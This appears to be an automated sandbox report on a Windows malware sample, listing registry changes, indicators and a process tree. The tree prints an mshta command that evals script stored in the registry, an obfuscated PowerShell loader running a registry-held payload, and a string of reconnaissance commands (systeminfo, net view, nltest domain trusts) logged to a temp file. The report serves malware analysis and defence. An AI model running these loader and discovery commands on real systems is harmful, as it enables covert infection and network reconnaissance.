\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = b1d97d9238a7d801 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7df64d0b8ce57658894b87824f6c7365f089fc082206dc50325f02b2cbfacdea" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "0" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d724897-1082-4cb9- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bf9b381c0f6d6c6843c6e75b141b29022c99e5eaf9ba7bd4b11b59983bec26d6" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33c0dd8d-a0ef-4efa- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = dd0d9f9238a7d801 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002f45ea7f38a7d8018f66709238a7d8018f66709238a7d801116d10000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000376466363464306238636535373635383839346238373832346636633733363566303839666330383232303664633530333235663032623263626661636465610000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00370064006600360034006400300062003800630065003500370036003500380038003900340062003800370038003200340066003600630037003300360035006600300038003900660063003000380032003200300036006400630035003000330032003500660030003200620032006300620066006100630064006500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37646636346430623863653537363538383934623837383234663663373336356630383966633038323230366463353033323566303262326362666163646561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6781d2d3-a64b-43be- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000040a8ae7f38a7d801d67d269238a7d801d67d269238a7d801669907000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000303731616533306263373336353639396430343461373562613831393165346439633339323030666332376238353635643838646165316563383730313364340000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000980fd800300037003100610065003300300062006300370033003600350036003900390064003000340034006100370035006200610038003100390031006500340064003900630033003900320030003000660063003200370062003800350036003500640038003800640061006500310065006300380037003000310033006400340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30373161653330626337333635363939643034346137356261383139316534643963333932303066633237623835363564383864616531656338373031336434000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 RuntimeBroker.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepowershell.exeExplorer.EXEpid process 1952 regsvr32.exe 1952 regsvr32.exe 1728 powershell.exe 1728 powershell.exe 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2588 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exeExplorer.EXEpid process 1728 powershell.exe 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE 2588 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
powershell.exeExplorer.EXEWMIC.exetasklist.exedescription pid process Token: SeDebugPrivilege 1728 powershell.exe Token: SeShutdownPrivilege 2588 Explorer.EXE Token: SeCreatePagefilePrivilege 2588 Explorer.EXE Token: SeIncreaseQuotaPrivilege 3344 WMIC.exe Token: SeSecurityPrivilege 3344 WMIC.exe Token: SeTakeOwnershipPrivilege 3344 WMIC.exe Token: SeLoadDriverPrivilege 3344 WMIC.exe Token: SeSystemProfilePrivilege 3344 WMIC.exe Token: SeSystemtimePrivilege 3344 WMIC.exe Token: SeProfSingleProcessPrivilege 3344 WMIC.exe Token: SeIncBasePriorityPrivilege 3344 WMIC.exe Token: SeCreatePagefilePrivilege 3344 WMIC.exe Token: SeBackupPrivilege 3344 WMIC.exe Token: SeRestorePrivilege 3344 WMIC.exe Token: SeShutdownPrivilege 3344 WMIC.exe Token: SeDebugPrivilege 3344 WMIC.exe Token: SeSystemEnvironmentPrivilege 3344 WMIC.exe Token: SeRemoteShutdownPrivilege 3344 WMIC.exe Token: SeUndockPrivilege 3344 WMIC.exe Token: SeManageVolumePrivilege 3344 WMIC.exe Token: 33 3344 WMIC.exe Token: 34 3344 WMIC.exe Token: 35 3344 WMIC.exe Token: 36 3344 WMIC.exe Token: SeIncreaseQuotaPrivilege 3344 WMIC.exe Token: SeSecurityPrivilege 3344 WMIC.exe Token: SeTakeOwnershipPrivilege 3344 WMIC.exe Token: SeLoadDriverPrivilege 3344 WMIC.exe Token: SeSystemProfilePrivilege 3344 WMIC.exe Token: SeSystemtimePrivilege 3344 WMIC.exe Token: SeProfSingleProcessPrivilege 3344 WMIC.exe Token: SeIncBasePriorityPrivilege 3344 WMIC.exe Token: SeCreatePagefilePrivilege 3344 WMIC.exe Token: SeBackupPrivilege 3344 WMIC.exe Token: SeRestorePrivilege 3344 WMIC.exe Token: SeShutdownPrivilege 3344 WMIC.exe Token: SeDebugPrivilege 3344 WMIC.exe Token: SeSystemEnvironmentPrivilege 3344 WMIC.exe Token: SeRemoteShutdownPrivilege 3344 WMIC.exe Token: SeUndockPrivilege 3344 WMIC.exe Token: SeManageVolumePrivilege 3344 WMIC.exe Token: 33 3344 WMIC.exe Token: 34 3344 WMIC.exe Token: 35 3344 WMIC.exe Token: 36 3344 WMIC.exe Token: SeShutdownPrivilege 2588 Explorer.EXE Token: SeCreatePagefilePrivilege 2588 Explorer.EXE Token: SeDebugPrivilege 1196 tasklist.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2588 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3088 wrote to memory of 1952 3088 regsvr32.exe regsvr32.exe PID 3088 wrote to memory of 1952 3088 regsvr32.exe regsvr32.exe PID 3088 wrote to memory of 1952 3088 regsvr32.exe regsvr32.exe PID 852 wrote to memory of 1728 852 mshta.exe powershell.exe PID 852 wrote to memory of 1728 852 mshta.exe powershell.exe PID 1728 wrote to memory of 2004 1728 powershell.exe csc.exe PID 1728 wrote to memory of 2004 1728 powershell.exe csc.exe PID 2004 wrote to memory of 4544 2004 csc.exe cvtres.exe PID 2004 wrote to memory of 4544 2004 csc.exe cvtres.exe PID 1728 wrote to memory of 4568 1728 powershell.exe csc.exe PID 1728 wrote to memory of 4568 1728 powershell.exe csc.exe PID 4568 wrote to memory of 3680 4568 csc.exe cvtres.exe PID 4568 wrote to memory of 3680 4568 csc.exe cvtres.exe PID 1728 wrote to memory of 2588 1728 powershell.exe Explorer.EXE PID 1728 wrote to memory of 2588 1728 powershell.exe Explorer.EXE PID 1728 wrote to memory of 2588 1728 powershell.exe Explorer.EXE PID 1728 wrote to memory of 2588 1728 powershell.exe Explorer.EXE PID 2588 wrote to memory of 3396 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3396 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3396 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3396 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3664 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3664 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3664 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3664 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3520 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3520 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3520 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 3520 2588 Explorer.EXE RuntimeBroker.exe PID 2588 wrote to memory of 4584 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4584 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 4584 wrote to memory of 3344 4584 cmd.exe WMIC.exe PID 4584 wrote to memory of 3344 4584 cmd.exe WMIC.exe PID 4584 wrote to memory of 1984 4584 cmd.exe more.com PID 4584 wrote to memory of 1984 4584 cmd.exe more.com PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4752 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4372 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4372 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 2816 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 2816 2588 Explorer.EXE cmd.exe PID 2816 wrote to memory of 452 2816 cmd.exe systeminfo.exe PID 2816 wrote to memory of 452 2816 cmd.exe systeminfo.exe PID 2588 wrote to memory of 4360 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4360 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4180 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4180 2588 Explorer.EXE cmd.exe PID 4180 wrote to memory of 676 4180 cmd.exe net.exe PID 4180 wrote to memory of 676 4180 cmd.exe net.exe PID 2588 wrote to memory of 4652 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4652 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4836 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 4836 2588 Explorer.EXE cmd.exe PID 4836 wrote to memory of 3660 4836 cmd.exe nslookup.exe PID 4836 wrote to memory of 3660 4836 cmd.exe nslookup.exe PID 2588 wrote to memory of 3548 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 3548 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 2040 2588 Explorer.EXE cmd.exe PID 2588 wrote to memory of 2040 2588 Explorer.EXE cmd.exe PID 2040 wrote to memory of 1196 2040 cmd.exe tasklist.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3396
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll1⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3664
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"5⤵PID:4544
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"5⤵PID:3680
-
C:\Windows\system32\cmd.execmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get domain3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3344 -
C:\Windows\system32\more.commore3⤵PID:1984
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4752
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4372
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:452 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4360
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:676 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4652
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:3660
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:3548
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1196 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:3320
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:1300
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:4216
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:2084
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4272
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:2836
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:2564
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:1340
-
C:\Windows\system32\net.exenet config workstation3⤵PID:1748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:1732
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4812
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4748
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:4912
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4672
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4768
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:5028
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:3792
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:2188
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:856 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:956
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4008
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:3360 -
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:4384
-
